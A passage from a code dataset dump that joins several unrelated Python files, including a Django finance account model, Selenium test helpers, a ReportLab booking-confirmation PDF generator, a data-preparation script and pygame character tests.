apps.get_model('bank', 'FundingSource')\n account = self.model.objects.get(\n id=account_id, type_ds=self.model.DEBIT)\n\n if not FundingSource.objects.filter(account=account).exists():\n message = 'Attempt to set \"is_funding_source_for_transfer\" '\n message += 'for account that not exists in bank.FundingSource.'\n raise ValidationError(message)\n\n self.model.objects.active().filter(\n member__user=account.member.user)\\\n .update(is_funding_source_for_transfer=False)\n account.is_funding_source_for_transfer = True\n account.save()\n return account\n\n def set_account_number(self, account_id, account_number):\n \"\"\"\n Can set account only if didn't set before.\n Used for debt accounts.\n \"\"\"\n account = self.model.objects.get(id=account_id)\n if account.account_number is not None:\n raise ValidationError('Account number was set earlier.')\n\n account.account_number = account_number\n account.save()\n\n @transaction.atomic\n def change_active(self, account_id, is_active):\n \"\"\"\n is_active = True - besides account itself,\n activates also all transactions.\n is_active = False - besides account itself,\n deactivates also all transactions.\n \"\"\"\n Transaction = apps.get_model('finance', 'Transaction')\n self.model.objects.filter(id=account_id)\\\n .update(is_active=is_active)\n Transaction.objects.filter(account_id=account_id)\\\n .update(is_active=is_active)\n\n\nclass Account(ActiveModel):\n \"\"\"\n type - Atrium MX type.\n type_ds - Donkies type.\n \"\"\"\n CHECKING = 'CHECKING'\n SAVINGS = 'SAVINGS'\n CASH = 'CASH'\n PREPAID = 'PREPAID'\n LOAN = 'LOAN'\n CREDIT_CARD = 'CREDIT_CARD'\n LINE_OF_CREDIT = 'LINE_OF_CREDIT'\n MORTGAGE = 'MORTGAGE'\n INVESTMENT = 'INVESTMENT'\n PROPERTY = 'PROPERTY'\n\n DEBIT_TYPES = (CHECKING, SAVINGS, CASH, PREPAID)\n DEBT_TYPES = (LOAN, CREDIT_CARD, LINE_OF_CREDIT, MORTGAGE)\n INVESTMENT_TYPES = (INVESTMENT, PROPERTY)\n\n DEBIT = 'debit'\n DEBT = 'debt'\n INVESTMENT = 'investment'\n OTHER = 'other'\n\n TYPE_DS_CHOICES = (\n (DEBIT, 'debit'),\n (DEBT, 'debt'),\n (INVESTMENT, 'investment'),\n (OTHER, 'other'))\n\n member = models.ForeignKey('Member', related_name='accounts')\n guid = models.CharField(max_length=100, unique=True)\n uid = models.CharField(max_length=50, unique=True)\n name = models.CharField(max_length=255, null=True, default=None)\n apr = models.DecimalField(\n max_digits=10,\n decimal_places=6,\n help_text='Annual Percentage Rate.',\n null=True,\n default=None)\n apy = models.DecimalField(\n max_digits=10,\n decimal_places=6,\n help_text='Annual Percentage Yield.',\n null=True,\n default=None)\n available_balance = models.DecimalField(\n max_digits=14,\n decimal_places=2,\n help_text='The current available account balance.',\n null=True,\n default=None)\n available_credit = models.DecimalField(\n max_digits=10,\n decimal_places=2,\n help_text='The current available credit balance of the account.',\n null=True,\n default=None)\n balance = models.DecimalField(\n max_digits=14,\n decimal_places=2,\n help_text='The current Account Balance.',\n null=True,\n default=None)\n created_at = models.DateTimeField(null=True, default=None)\n day_payment_is_due = models.IntegerField(null=True, default=None)\n is_closed = models.BooleanField(default=False)\n credit_limit = models.DecimalField(\n max_digits=10,\n decimal_places=2,\n help_text='The credit limit for the account.',\n null=True,\n default=None)\n interest_rate = models.DecimalField(\n max_digits=10,\n decimal_places=6,\n help_text='Interest rate, %',\n null=True,\n default=None)\n last_payment = models.DecimalField(\n max_digits=10,\n decimal_places=2,\n help_text='Amount of the account\\'s last payment.',\n null=True,\n default=None)\n last_payment_at = models.DateTimeField(null=True, default=None)\n matures_on = models.DateTimeField(null=True, default=None)\n minimum_balance = models.DecimalField(\n max_digits=14,\n decimal_places=2,\n help_text='Minimum required balance.',\n null=True,\n default=None)\n minimum_payment = models.DecimalField(\n max_digits=10,\n decimal_places=2,\n help_text='Minimum payment.',\n null=True,\n default=None)\n original_balance = models.DecimalField(\n max_digits=14,\n decimal_places=2,\n help_text='Original balance.',\n null=True,\n default=None)\n payment_due_at = models.DateTimeField(null=True, default=None)\n payoff_balance = models.DecimalField(\n max_digits=14,\n decimal_places=2,\n help_text='Payoff Balance',\n null=True,\n default=None)\n started_on = models.DateTimeField(null=True, default=None)\n subtype = models.CharField(max_length=255, null=True, default=None)\n total_account_value = models.DecimalField(\n max_digits=14,\n decimal_places=2,\n help_text='The total value of the account.',\n null=True,\n default=None)\n type = models.CharField(max_length=100, null=True, default=None)\n type_ds = models.CharField(\n max_length=15,\n help_text='Internal type',\n choices=TYPE_DS_CHOICES,\n default=OTHER)\n updated_at = models.DateTimeField(null=True, default=None)\n transfer_share = models.IntegerField(\n default=0,\n help_text=(\n 'For debt accounts in percentage. '\n 'Share of transfer amount between debt accounts.'\n 'The total share of all accounts should be 100%.'\n )\n )\n is_funding_source_for_transfer = models.BooleanField(\n default=False,\n help_text='For debit account. Funding source for transfer.')\n account_number = models.CharField(\n max_length=100, null=True, default=None, blank=True,\n help_text='For debt accounts only. Set by user.')\n\n objects = AccountManager()\n\n class Meta:\n app_label = 'finance'\n verbose_name = 'account'\n verbose_name_plural = 'accounts'\n ordering = ['type_ds', 'member', 'name']\n\n def __str__(self):\n s = self.member.name\n if self.name:\n s += ' {}'.format(self.name)\n s += ' ({})'.format(self.member.user.email)\n return s\n\n @property\n def funding_source(self):\n \"\"\"\n Returns associated funding source or None.\n \"\"\"\n FundingSource = apps.get_model('bank', 'FundingSource')\n return FundingSource.objects.filter(account=self).first()\n\n @property\n def is_dwolla_created(self):\n fs = self.funding_source\n if fs is None:\n return False\n if fs.dwolla_id is None:\n return False\n return True\n\n def save(self, *args, **kwargs):\n \"\"\"\n Assume that account can not change type.\n For example: debt account can not be debit.\n If account can change type: TODO handle this.\n \"\"\"\n if not self.pk:\n self.type_ds = self.get_ds_type()\n self.uid = uuid.uuid4().hex\n super().save(*args, **kwargs)\n\n def get_ds_type(self):\n if self.type in self.DEBIT_TYPES:\n return self.DEBIT\n if self.type in self.DEBT_TYPES:\n return self.DEBT\n if self.type in self.INVESTMENT_TYPES:\n return self.INVESTMENT\n return self.OTHER\n\n\n@receiver(post_save, sender=Account)\ndef apply_transfer_share(sender, instance, created, **kwargs):\n \"\"\"\n If user adds first debt account, set transfer_share to 100%.\n \"\"\"\n if instance.type_ds == Account.DEBT:\n qs = Account.objects.active().filter(\n member__user=instance.member.user, type_ds=Account.DEBT)\n if qs.count() == 1:\n Account.objects.active().filter(\n id=instance.id).update(transfer_share=100)\n\n\n@admin.register(Account)\nclass AccountAdmin(admin.ModelAdmin):\n list_display = (\n 'name',\n 'member',\n 'type_ds',\n 'guid',\n 'available_balance',\n 'available_credit',\n 'balance',\n 'credit_limit',\n 'original_balance',\n 'payoff_balance',\n 'account_number'\n )\n\n def has_delete_permission(self, request, obj=None):\n return False\n","sub_path":"donkies/finance/models/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":11257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"50496881","text":"import sys\nsys.path.append(\"..\")\nfrom selenium.webdriver.common.keys import Keys\nimport os,random,configparser\nimport datetime\nfrom common import variable\n\ndef randomChar(n):\n '''获取n个字符'''\n temp = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'\n list = random.sample(temp, n)\n result=''\n for i in list:\n result = result+i\n return result\n \ndef getDateTime(t=0):\n '''获取日期如:2017-06-12\n 默认为当前日期。t>0表示超前t天,t<0表示后退t天'''\n today = datetime.date.today()\n day = datetime.timedelta(days=t)\n return str(today+day)\n \ndef lenChar(driver, element):\n ##返回输入框数据长度\n ele = driver.find_element(element)\n return len(ele.get_attribute('value'))\n \ndef lenJudge(driver, element, lenn):\n ##输入框内数据长度判断\n ele = driver.find_element(element)\n lene = len(ele.get_attribute('value'))\n if lene==lenn:\n return True\n else:\n return False\n \ndef getChar(name, lenn=0):\n #返回指定长度的字符串\n if lenn <=0:\n return name\n else:\n temp = name\n while(len(temp)?\"\n charexcn = \"·~!#¥%……&*()——+【】;’、:“|,。、《》?\"\n if ex=='all':\n charex = charexen + charexcn\n return charex\n elif ex=='en':\n return charexen\n elif ex=='cn':\n return charexcn\n \ndef insert_img(driver,file_name):\n base_dir = os.path.dirname(os.path.dirname(__file__))\n base_dir = str(base_dir)\n base_dir = base_dir.replace('\\\\','/')\n base = base_dir.split('test_case')[0]\n file_path = base+'report/image/'+file_name\n driver.get_screenshot_as_file(file_path)\n\n \ndef new_window(driver,windowName,url=''):\n '''新建一标签页,如果输入url则打开URL,操作标签即为新建的标签页'''\n allhandles1 = driver.window_handles\n while(1):\n if variable.Driver==\"Firefox\":\n js='window.open(\"\");'\n driver.execute_script(js)\n elif variable.Driver==\"Chrome\":\n driver.find_element_by_tag_name('body').send_keys(Keys.CONTROL + 't')\n allhandles2 = driver.window_handles\n if len(allhandles2)>len(allhandles1):\n break\n new_window = 'None'\n for new_window in allhandles2:\n for handle in allhandles1:\n if new_window == handle:\n #new_window在allhandles1中,所以不是刚才添加的window\n new_window= 'None'\n break\n if new_window != 'None':\n #找到了刚才添加的window\n break\n driver.switch_to_window(new_window)\n variable.Tabs[windowName] = new_window\n if url!='':\n driver.get(url)\n\ndef new_report(testreport):\n lists = os.listdir(testreport)\n lists.sort(key=lambda fn : os.path.getmtime(testreport + '\\\\' + fn))\n file_new = os.path.join(testreport,lists[-1])\n return file_new\n\ndef isElementExist(driver,element_loc):\n '''判断元素存在'''\n try:\n driver.find_element(*element_loc)\n return True\n except:\n return False\n\ndef read_ini():\n config = configparser.ConfigParser()\n #config.readfp(open('config.ini','wb'))\n conf_file = os.getcwd()+r'\\data'\n config.read(conf_file+r'\\config.ini')\n\n variable.Driver = config.get(\"config\",\"Driver\")\n variable.ENVI = config.get(\"config\",\"RunningEnvironment\")\n variable.StartUp_Mode = config.get(\"config\",\"BootMode\")\n variable.UserName = config.get(\"config\",\"UserName\")\n variable.Password = config.get(\"config\",\"Password\")\n variable.PublicationType = config.get(\"config\",\"PublicationType\")\n variable.BookName = config.get(\"config\",\"BookName\")\n variable.BookNum = config.get(\"config\",\"BookNum\")\n \ndef isbn():\n '''返回一个数组'''\n isbn1 = random.choice([978,979])\n isbn2 = random.randint(1,9)\n isbn3 = random.randint(1000,9999)\n isbn4 = random.randint(1000,9999)\n isbn5 = int(isbn1/100)+int((isbn1%100)/10)*3+isbn1%10+isbn2*3+int(isbn3/1000)+int((isbn3%1000)/100)*3+int((isbn3%100)/10)+(isbn3%10)*3+int(isbn4/1000)+int((isbn4%1000)/100)*3+int((isbn4%100)/10)+(isbn4%10)*3\n isbn5 = isbn5%10\n isbn5 = 10 - isbn5\n if isbn5==10:\n isbn5=0\n isbn=[isbn1,isbn2,isbn3,isbn4,isbn5]\n return isbn\n\ndef cn():\n cn1 = str(random.randint(0,9))+str(random.randint(0,9))\n cn2 = str(random.randint(0,9))+str(random.randint(0,9))+str(random.randint(0,9))+str(random.randint(0,9))\n cn3 = random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ')\n cn = [cn1,cn2,cn3]\n return cn\n\nif __name__ == '__main__':\n print(getDateTime())\n print(randomChar(6))\n","sub_path":"ISLI_RA/common/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":4872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"615292182","text":"##Variables\r\npmt = int(input(\"Starting balance: \"))\r\nbeg = int(input(\"Starting interest rate: \"))\r\nend = int(input(\"Ending interest rate: \"))\r\ntime = int(input(\"Number of years: \"))\r\nlst1 = []\r\nlst1.append(beg,end,1)\r\ncounter = 1\r\n\r\n##Logic\r\nfor i in lst1:\r\n print(\"Interest rate of \"+str(i*100)+\" %:\") \r\n while counter <= time:\r\n pmt = pmt + (pmt * i)\r\n print(\"Balance after year \"+str(counter)+\" is $ \"+str(round(pmt,2)))\r\n counter += 1\r\n counter = 1\r\n pmt = 1000\r\n print(\"\\n\")\r\n","sub_path":"Assignment 11/Assignment 11.3.b.py","file_name":"Assignment 11.3.b.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"244765946","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nThe script that prepares the environment: copies files where they belong in order to \nbe accessable in the repo, archives the 500Mb big GooseFieldForageData\nCreated on Tue Apr 14 13:04:21 2020\n\n@author: andrey\n\"\"\"\nimport shutil \nimport os\nimport errno\nimport distutils.dir_util\nimport zlib\nimport bz2 # Use bz2 or zlib at work\nimport lzma # Use LZMA at home, where internet connection is bad\nimport zipfile\ndata_dir = \"~/CLionProjects/GooseTests/run-directory1/\"\n#source_dir = \"~/CLionProjects/ALMaSS_all\"\nfield_dir =\"~/CLionProjects/GooseTests/ALMaSS_inputs\"\n\ndata_dir_new =os.path.dirname(__file__)+\"/rundir\"\nwith open(\"filelistdata\") as fp:\n datafileslist=fp.readlines()\n\ndatafileslist = [x.strip() for x in datafileslist] \n\n#source_dir_new =os.path.dirname(__file__)+ \"/source\"\nfield_dir_new =os.path.dirname(__file__)+ \"/fielddir\"\nfor j in [data_dir_new, field_dir_new]:\n try:\n os.mkdir(j)\n break\n except OSError as error:\n \n if error.errno != errno.EEXIST:\n raise\n else:\n print(j+\" Directory exists: Ignoring\")\n pass\n \nfor i in datafileslist:\n if i == \"GooseFieldForageData.txt\":\n cwd_s = os.getcwd()\n os.chdir(os.path.expanduser(data_dir+\"/\"))\n zipObj = zipfile.ZipFile(os.path.expanduser(data_dir_new+\"/\"+i+\".gz\"), 'w', compression=zipfile.ZIP_BZIP2) #ZIP_LZMA ZIP_BZIP2 ZIP_DEFLATED\n zipObj.write(os.path.expanduser(i))\n zipObj.close()\n os.chdir(cwd_s)\n else:\n \n shutil.copy2(os.path.expanduser(data_dir+\"/\"+i), data_dir_new)\n#distutils.dir_util.copy_tree(os.path.expanduser(source_dir), source_dir_new)\ndistutils.dir_util.copy_tree(os.path.expanduser(field_dir), field_dir_new)\n\n\n","sub_path":"prepare_env.py","file_name":"prepare_env.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"221604070","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dra', '0010_auto_20160122_1610'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='cpu',\n name='tasktime',\n field=models.CharField(help_text=b'tasktime', max_length=50),\n ),\n ]\n","sub_path":"dra/migrations/0011_auto_20160122_1615.py","file_name":"0011_auto_20160122_1615.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"70364523","text":"from __future__ import print_function\nimport requests\nimport json\n\n# function to retrieve a picklist option using a picklist option ID\ndef get(url, auth):\n # build url for request\n requestURL = url\n print(requestURL)\n # make request\n pickListOption = requests.get(requestURL, auth=auth)\n\n\n if pickListOption.status_code >= 400:\n raise IOError(\"Error Code while retrieving data: \" + str(pickListOption.status_code))\n\n pickListOption_json = json.loads(pickListOption.text)\n\n return pickListOption_json","sub_path":"PickListOption.py","file_name":"PickListOption.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"348403062","text":"import os\nfrom io import BytesIO\nfrom datetime import date\n\nfrom reportlab.lib import enums\nfrom reportlab.lib.pagesizes import A4\nfrom reportlab.platypus import BaseDocTemplate, PageTemplate, Frame, Paragraph, Spacer, Table, TableStyle, ListFlowable, KeepTogether, PageBreak, Image, ImageAndFlowables\nfrom reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle\nfrom reportlab.lib.utils import ImageReader\nfrom reportlab.lib.colors import HexColor\n\nfrom django.core.files import File\nfrom django.conf import settings\n\nfrom parkstay.models import Booking, BookingVehicleRego\n\n\nDPAW_HEADER_LOGO = os.path.join(settings.BASE_DIR, 'parkstay', 'static', 'ps', 'img', 'parkstay_header.png')\n\nLICENCE_HEADER_IMAGE_WIDTH = 840\nLICENCE_HEADER_IMAGE_HEIGHT = 166\n\nDPAW_BUSINESS = 'Parks and Visitor Services'\nDPAW_EMAIL = 'campgrounds@dpaw.wa.gov.au'\nDPAW_URL = 'https://parks.dpaw.wa.gov.au'\nDPAW_PHONE = '(08) 9219 9000'\nDPAW_FAX = '(08) 9423 8242'\nDPAW_PO_BOX = 'Locked Bag 104, Bentley Delivery Centre, Western Australia 6983'\n\n\nPAGE_WIDTH, PAGE_HEIGHT = A4\n\nDEFAULT_FONTNAME = 'Helvetica'\nBOLD_FONTNAME = 'Helvetica-Bold'\nITALIC_FONTNAME = 'Helvetica-Oblique'\nBOLD_ITALIC_FONTNAME = 'Helvetica-BoldOblique'\n\nVERY_LARGE_FONTSIZE = 14\nLARGE_FONTSIZE = 12\nMEDIUM_FONTSIZE = 10\nSMALL_FONTSIZE = 8\n\nPARAGRAPH_BOTTOM_MARGIN = 5\n\nSECTION_BUFFER_HEIGHT = 10\n\nDATE_FORMAT = '%d/%m/%Y'\n\nHEADER_MARGIN = 10\nHEADER_SMALL_BUFFER = 3\n\nPAGE_MARGIN = 20\nPAGE_TOP_MARGIN = 200\n\nLETTER_HEADER_MARGIN = 30\nLETTER_PAGE_MARGIN = 60\nLETTER_IMAGE_WIDTH = LICENCE_HEADER_IMAGE_WIDTH/3.0\nLETTER_IMAGE_HEIGHT = LICENCE_HEADER_IMAGE_HEIGHT/3.0\nLETTER_HEADER_RIGHT_LABEL_OFFSET = 400\nLETTER_HEADER_RIGHT_INFO_OFFSET = 450\nLETTER_HEADER_SMALL_BUFFER = 5\nLETTER_ADDRESS_BUFFER_HEIGHT = 40\nLETTER_BLUE_FONT = 0x045690\n\nstyles = getSampleStyleSheet()\nstyles.add(ParagraphStyle(name='InfoTitleLargeCenter', fontName=BOLD_FONTNAME, fontSize=LARGE_FONTSIZE,\n spaceAfter=PARAGRAPH_BOTTOM_MARGIN, alignment=enums.TA_CENTER))\nstyles.add(ParagraphStyle(name='InfoTitleVeryLargeCenter', fontName=BOLD_FONTNAME, fontSize=VERY_LARGE_FONTSIZE,\n spaceAfter=PARAGRAPH_BOTTOM_MARGIN * 2, alignment=enums.TA_CENTER))\nstyles.add(ParagraphStyle(name='InfoTitleLargeLeft', fontName=BOLD_FONTNAME, fontSize=LARGE_FONTSIZE,\n spaceAfter=PARAGRAPH_BOTTOM_MARGIN, alignment=enums.TA_LEFT,\n leftIndent=PAGE_WIDTH / 10, rightIndent=PAGE_WIDTH / 10))\nstyles.add(ParagraphStyle(name='InfoTitleLargeRight', fontName=BOLD_FONTNAME, fontSize=LARGE_FONTSIZE,\n spaceAfter=PARAGRAPH_BOTTOM_MARGIN, alignment=enums.TA_RIGHT,\n rightIndent=PAGE_WIDTH / 10))\nstyles.add(ParagraphStyle(name='BoldLeft', fontName=BOLD_FONTNAME, fontSize=MEDIUM_FONTSIZE, alignment=enums.TA_LEFT))\nstyles.add(ParagraphStyle(name='BoldRight', fontName=BOLD_FONTNAME, fontSize=MEDIUM_FONTSIZE, alignment=enums.TA_RIGHT))\nstyles.add(ParagraphStyle(name='ItalicLeft', fontName=ITALIC_FONTNAME, fontSize=MEDIUM_FONTSIZE, alignment=enums.TA_LEFT))\nstyles.add(ParagraphStyle(name='ItalicRight', fontName=ITALIC_FONTNAME, fontSize=MEDIUM_FONTSIZE, alignment=enums.TA_RIGHT))\nstyles.add(ParagraphStyle(name='Center', alignment=enums.TA_CENTER))\nstyles.add(ParagraphStyle(name='Left', alignment=enums.TA_LEFT))\nstyles.add(ParagraphStyle(name='Right', alignment=enums.TA_RIGHT))\nstyles.add(ParagraphStyle(name='LetterLeft', fontSize=LARGE_FONTSIZE, alignment=enums.TA_LEFT))\nstyles.add(ParagraphStyle(name='LetterBoldLeft', fontName=BOLD_FONTNAME, fontSize=LARGE_FONTSIZE, alignment=enums.TA_LEFT))\n\n\ndef _create_letter_header_footer(canvas, doc):\n # header\n current_y = PAGE_HEIGHT - LETTER_HEADER_MARGIN\n\n dpaw_header_logo = ImageReader(DPAW_HEADER_LOGO)\n canvas.drawImage(dpaw_header_logo, LETTER_HEADER_MARGIN, current_y - LETTER_IMAGE_HEIGHT,\n width=LETTER_IMAGE_WIDTH, height=LETTER_IMAGE_HEIGHT)\n\n\ndef create_confirmation(confirmation_buffer, booking):\n every_page_frame = Frame(PAGE_MARGIN, PAGE_MARGIN, PAGE_WIDTH - 2 * PAGE_MARGIN,\n PAGE_HEIGHT - 160, id='EveryPagesFrame')\n every_page_template = PageTemplate(id='EveryPages', frames=every_page_frame, onPage=_create_letter_header_footer)\n\n doc = BaseDocTemplate(confirmation_buffer, pageTemplates=[every_page_template], pagesize=A4)\n\n elements = []\n\n elements.append(Paragraph('BOOKING CONFIRMATION', styles['InfoTitleVeryLargeCenter']))\n\n #im = Image(os.path.join(settings.BASE_DIR, 'parkstay', 'static', 'ps', 'img', 'placeholder.jpg'))\n #text1 = Paragraph('But they had not gone twenty yards when they stopped short. An uproar of voices was coming from the farmhouse. They rushed back and looked through the window again. Yes, a violent quarrel was in progress. There were shoutings, bangings on the table, sharp suspicious glances, furious denials. The source of the trouble appeared to be that Napoleon and Mr. Pilkington had each played an ace of spades simultaneously.', styles['Left'])\n #text2 = Paragraph('Twelve voices were shouting in anger, and they were all alike. No question, now, what had happened to the faces of the pigs. The creatures outside looked from pig to man, and from man to pig, and from pig to man again; but already it was impossible to say which was which.', styles['Left'])\n\n #elements.append(ImageAndFlowables(im, [text1, text2], imageSide='left'))\n \n \n\n table_data = []\n table_data.append([Paragraph('Campground', styles['BoldLeft']), Paragraph('{}, {}'.format(booking.campground.name, booking.campground.park.name), styles['BoldLeft'])])\n \n if booking.first_campsite_list:\n campsites = []\n if booking.campground.site_type == 0:\n for item in booking.first_campsite_list:\n campsites.append(item.name if item else \"\" )\n elif booking.campground.site_type == 1 or 2:\n for item in booking.first_campsite_list:\n campsites.append(item.type.split(':',1)[0] if item else \"\")\n campsite = ', '.join(campsites)\n result = {x:campsites.count(x) for x in campsites}\n for key, value in result.items():\n campsite = ', '.join(['%sx %s' % (value, key) for (key, value) in result.items()])\n\n \n\n table_data.append([Paragraph('Camp Site', styles['BoldLeft']), Paragraph(campsite, styles['Left'])])\n \n table_data.append([Paragraph('Dates', styles['BoldLeft']), Paragraph(booking.stay_dates, styles['Left'])])\n table_data.append([Paragraph('Number of guests', styles['BoldLeft']), Paragraph(booking.stay_guests, styles['Left'])])\n table_data.append([Paragraph('Name', styles['BoldLeft']), Paragraph(u'{} {} ({})'.format(booking.details.get('first_name', ''), booking.details.get('last_name', ''), booking.customer.email if booking.customer else None), styles['Left'])])\n table_data.append([Paragraph('Booking confirmation number', styles['BoldLeft']), Paragraph(booking.confirmation_number, styles['Left'])])\n\n if booking.vehicle_payment_status:\n vehicle_data = []\n for r in booking.vehicle_payment_status:\n data = [Paragraph(r['Type'], styles['Left']), Paragraph(r['Rego'], styles['Left'])]\n if r.get('Paid') != None:\n if r['Paid'] == 'Yes':\n data.append(Paragraph('Entry fee paid', styles['Left']))\n elif r['Paid'] == 'No':\n data.append(Paragraph('Unpaid', styles['Left']))\n elif r['Paid'] == 'pass_required':\n data.append(Paragraph('Park Pass Required', styles['Left']))\n vehicle_data.append(data)\n \n vehicles = Table(vehicle_data, style=TableStyle([('VALIGN', (0, 0), (-1, -1), 'TOP')]))\n table_data.append([Paragraph('Vehicles', styles['BoldLeft']), vehicles])\n else:\n table_data.append([Paragraph('Vehicles', styles['BoldLeft']), Paragraph('No vehicles', styles['Left'])])\n \n if booking.campground.additional_info: \n table_data.append([Paragraph('Additional confirmation information', styles['BoldLeft']), Paragraph(booking.campground.additional_info, styles['Left'])])\n\n elements.append(Table(table_data, colWidths=(200, None), style=TableStyle([('VALIGN', (0, 0), (-1, -1), 'TOP')])))\n\n doc.build(elements)\n return confirmation_buffer\n\n\n\n\ndef test():\n import tempfile\n import subprocess\n\n b = Booking.objects.get(id=34901)\n\n t = tempfile.NamedTemporaryFile()\n create_confirmation(t, b)\n t.flush()\n subprocess.call(['evince', t.name])\n t.close()\n","sub_path":"parkstay/pdf.py","file_name":"pdf.py","file_ext":"py","file_size_in_byte":8665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"382751738","text":"#!/usr/bin/python\n\nimport sys\n\nfrom easydict import easydict\nfrom cgix import *\nfrom jirunder_arrest import render_jira_markup, get_resp_data\n\n\n_render_test_html = u\"\"\"\\\n\n\n\njirunder-arrest - Render Test\n\n\n\n\n\n
\n\n
\n\n
\n\n
\n\n
\n\n
\n{_rendered}\n
\n\n\n\n\"\"\"\n\n\ndef get_render_page_html(jml):\n e = easydict()\n if jml:\n issue = 'SOFTWARE-1234' # arbitrarily\n resp = render_jira_markup(issue, jml)\n e._rendered = get_resp_data(resp)\n e._jml = escape_html(jml)\n else:\n e._rendered = ''\n e._jml = ''\n\n return _render_test_html.format(**e)\n\n\ndef main(args):\n uri, params = parse_request_uri()\n\n params = params or get_postdata_params()\n jml = params and params.get('jml')\n send_data(get_render_page_html(params and params.get('jml')))\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n\n\n","sub_path":"render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"104539158","text":"# -*- coding:utf-8 -*-\n'''\n测试:人物类:person_class\n'''\n\nfrom person_class import *\nimport os\nimport sys\nsys.path.append(\"..\")\nimport const.my_const\nfrom const.my_const import *\n\ndef createTestEnvironment():\n '''\n 创建PersonClass测试环境\n :return:\n '''\n screen = pygame.display.set_mode((1440,900), 0, 32)\n person = Person(PATH_Wxh, (1000,50), 300.0)\n return (screen, person)\n\n#----------------------------------------------存储图片测试的分割线-------------------------------------------------------\n\ndef test_image_filename_judge():\n '''\n 测试:image_filename_judge\n 将文件夹内的图片分类存入字典\n :return:\n '''\n image_dictionary = {\n (-1.0,0.0) : ['LEFT', []], (1.0,0.0) : ['RIGHT', []],\n (0.0,-1.0) : ['UP', []], (0.0,1.0) : ['DOWN', []],\n (-1.0,-1.0) : ['LEFTUP', []], (-1.0,1.0) : ['LEFTDOWN', []],\n (1.0,-1.0) : ['RIGHTUP',[]], (1.0,1.0) : ['RIGHTDOWN',[]],\n (0.0, 0.0) : ['NONE', []]\n }\n for f in os.listdir(PATH_Wxh):\n Person.image_filename_judge(f, image_dictionary)\n\n for each in image_dictionary:\n print(image_dictionary[each])\n\n\n\ndef test_image_dictionary():\n '''\n 测试:person类中test_image_dictionary内的数据\n 你说我为啥蛋疼的要去改变量名呢~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n :return:\n '''\n screen = pygame.display.set_mode((1440,900), 0, 32)\n person = Person(PATH_Wxh, (0,0), 300.0)\n for each in person.image_dictionary:\n print(person.image_dictionary[each])\n\n\n\n#----------------------------------------------------移动测试的分割线-------------------------------------------------------------\n\ndef test_person_move_direction():\n '''\n 测试角色移动方向:person_move_direction\n 手动\n :return:\n '''\n screen, person =createTestEnvironment()\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n exit()\n if event.type == KEYDOWN:\n move_direction= person.person_move_direction()\n print('move_direction:', move_direction)\n screen.fill((255,255,255))\n pygame.display.update()\n\ndef test_person_move_image():\n '''\n 接收移动方向向量,返回相应图片\n :return:\n '''\n screen, person =createTestEnvironment()\n for key in person.image_dictionary:\n for num in range(70):\n print(person.person_move_image(key))\n #screen.fill((255,255,255))\n #pygame.display.update()\n\ndef test_move_image_action():\n '''\n 测试:接收移动方向list,返回动作下标,由self.num计数\n :return:\n '''\n screen, person =createTestEnvironment()\n lists = ['DOWN_1.png', 'DOWN_2.png', 'DOWN_3.png', 'DOWN_4.png', 'DOWN_5.png', 'DOWN_6.png', 'DOWN_7.png', 'DOWN_8.png']\n test_lists = lists[1:9]*2\n judge_list = []\n for each in range(14):\n test_action = person.move_image_action(lists)\n if test_action == test_lists[each]:\n judge_list.append(True)\n else:\n print(\"%s.Error\")\n print(\"level\", each, \"move_image_action: \", test_action, \"test_demo: \", test_lists[each])\n if len(judge_list) == 14:\n print(\"test_move_image_action(): OK!\")\n\ndef test_person_move_image():\n '''\n 测试:接收移动方向向量,返回相应图片\n :return:\n '''\n screen, person =createTestEnvironment()\n judge_list = []\n for each in person.image_dictionary:\n if person.person_move_image(each) == person.image_dictionary[each][1][person.num]:\n judge_list.append(True)\n if len(judge_list) == 9:\n print(\"test_person_move_image() : OK!\")\n\ndef test_personMove():\n '''\n 测试角色移动:personMove\n 手动\n 测试有问题,还没想好......\n :return:\n '''\n\n screen, person =createTestEnvironment()\n image = 'image\\\\background2.jpg'\n backGround = BackGround(image)\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n exit()\n screen.blit(backGround.image, (0,0))\n person.person_move(backGround, screen)\n print('vector: ', person.vector, 'image: ', person.imageKey)\n pygame.display.update()\n\ndef test_render():\n screen, person =createTestEnvironment()\n #image = 'image\\\\background2.jpg'\n backGround = BackGround(const.my_const.SCENE_SHELTER_KEZHAN)\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n exit()\n screen.blit(backGround.image, (0,0))\n person.render(screen)\n pygame.display.update()\n\ndef test_person_move_distance_image():\n '''\n 测试:计算移动向量(包括距离和方向)\n :return:\n '''\n screen, person =createTestEnvironment()\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n exit()\n test_vector, test_image = person.person_move_distance_image()\n print(\"move_vetor: \", test_vector, \"image_key: \", test_image)\n pygame.display.update()\n\ndef test_color_judge_point():\n '''\n 